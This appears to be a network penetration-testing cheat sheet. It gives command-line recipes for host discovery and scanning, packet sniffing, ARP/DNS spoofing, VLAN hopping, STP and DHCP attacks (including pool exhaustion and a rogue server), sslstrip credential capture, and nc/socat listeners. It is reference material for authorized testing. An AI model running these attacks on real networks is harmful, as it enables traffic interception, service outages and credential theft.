Discovering Hosts from the Outside When you have a scope of IP ranges and need to find which hosts are responding:
ICMP ping -c 1 199.66.11.4 # Echo request to a single host fping -g 199.66.11.0/24 # Echo requests to a range nmap -PE -PM -PP -sn -n 199.66.11.0/24 # Echo, timestamp, and subnet mask requests
TCP Port Discovery # Fast scan of top 20 ports using masscan masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
HTTP Port Discovery masscan -p80,443,8000-8100,8443 199.66.11.0/24
UDP Port Discovery nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
Discovering Hosts from the Inside Passive netdiscover -p p0f -i eth0 -p -o /tmp/p0f.log # Bettercap net.recon on net.show
Active # ARP discovery nmap -sn < Networ k > # ARP requests netdiscover -r < Networ k > # ARP requests # NBT discovery nbtscan -r 192.168.0.1/24 # Bettercap probing net.probe on set net.probe.mdns true set net.probe.nbns true
Scanning Hosts TCP Scanning # Fast scan — top 1000 ports nmap -sV -sC -O -T4 -n -Pn -oA fastscan < I P > # Full port scan nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan < I P > # Full scan, slower (avoid -T4 failures) nmap -sV -sC -O -p- -n -Pn -oA fullscan < I P >
UDP Scanning # Quick check of top 100 UDP services nmap -sU -sV --version-intensity 0 -n -F -T4 < I P > # Full top 1000 UDP ports nmap -sU -sV --version-intensity 0 -n -T4 < I P >
SCTP Scanning nmap -T4 -sY -n -oA SCTFastScan < I P > nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan < I P >
Sniffing TCPDump sudo tcpdump -i < INTERFAC E > udp port 53 # DNS requests tcpdump -i < IFAC E > icmp # ICMP packets # Capture over SSH and view in Wireshark live ssh user@ < TARGET_I P > tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
Bettercap net.sniff on set net.sniff.output sniffed.pcap set net.sniff.local true
LAN Attacks ARP Spoofing # Bettercap arp.spoof on set arp.spoof.targets < I P > set arp.spoof.fullduplex true # arpspoof echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t 192.168.1.1 192.168.1.2 arpspoof -t 192.168.1.2 192.168.1.1
VLAN Hopping (802.1Q / DTP) By default, switch ports in Dynamic Auto mode will enter trunk mode if prompted by a DTP frame. Attackers can exploit this to access traffic across all VLANs.
# Check if switch is vulnerable dtpscan.sh # Enable trunking via Yersinia yersinia -G # Graphical mode
To configure a VLAN interface for a specific VLAN:
modprobe 8021q vconfig add eth1 250 dhclient eth1.250 arp-scan -I eth1.250 10.121.5.0/24
STP Attacks # STP Root Attack — become the root switch yersinia stp -attack 4 # STP TCP — force CAM table resets every 15 seconds yersinia stp -attack 1
DHCP Attacks # DHCP enumeration nmap --script broadcast-dhcp-discover # DHCP DoS (exhaust IP pool) yersinia dhcp -attack 1 # Rogue DHCP server python /usr/share/responder/DHCP.py -i 10.0.0.100 -r 10.0.0.1 -p 10.0.0.100 -I eth1 -S -R
Spoofing
DNS Spoofing set dns.spoof.hosts ./dns.spoof.hosts dns.spoof on
ICMP Redirect Send ICMP type 1 code 5 to redirect traffic through the attacker.
LLMNR/NBT-NS Spoofing Use Responder to impersonate services in local name resolution. Effective against Windows environments.
WPAD Spoofing Browsers use WPAD to auto-discover proxy settings. Responder can act as a malicious WPAD server.
sslStrip Downgrade HTTPS to HTTP to sniff credentials in cleartext:
apt-get install sslstrip sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
sslStrip and sslStrip+ no longer work effectively against modern browsers due to HSTS preloading and the includeSubdomains flag used by major domains.
TCP / SSL Listeners # Listen on TCP port sudo nc -l -p 80 socat TCP4-LISTEN:80,fork,reuseaddr -
# Generate self-signed certificate FILENAME = server openssl genrsa -out $FILENAME .key 1024 openssl req -new -key $FILENAME .key -x509 -sha256 -days 3653 -out $FILENAME .crt cat $FILENAME .key $FILENAME .crt > $FILENAME .pem # Listen with SSL sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert= $FILENAME .pem,cafile= $FILENAME .crt,verify= 0 -
References 
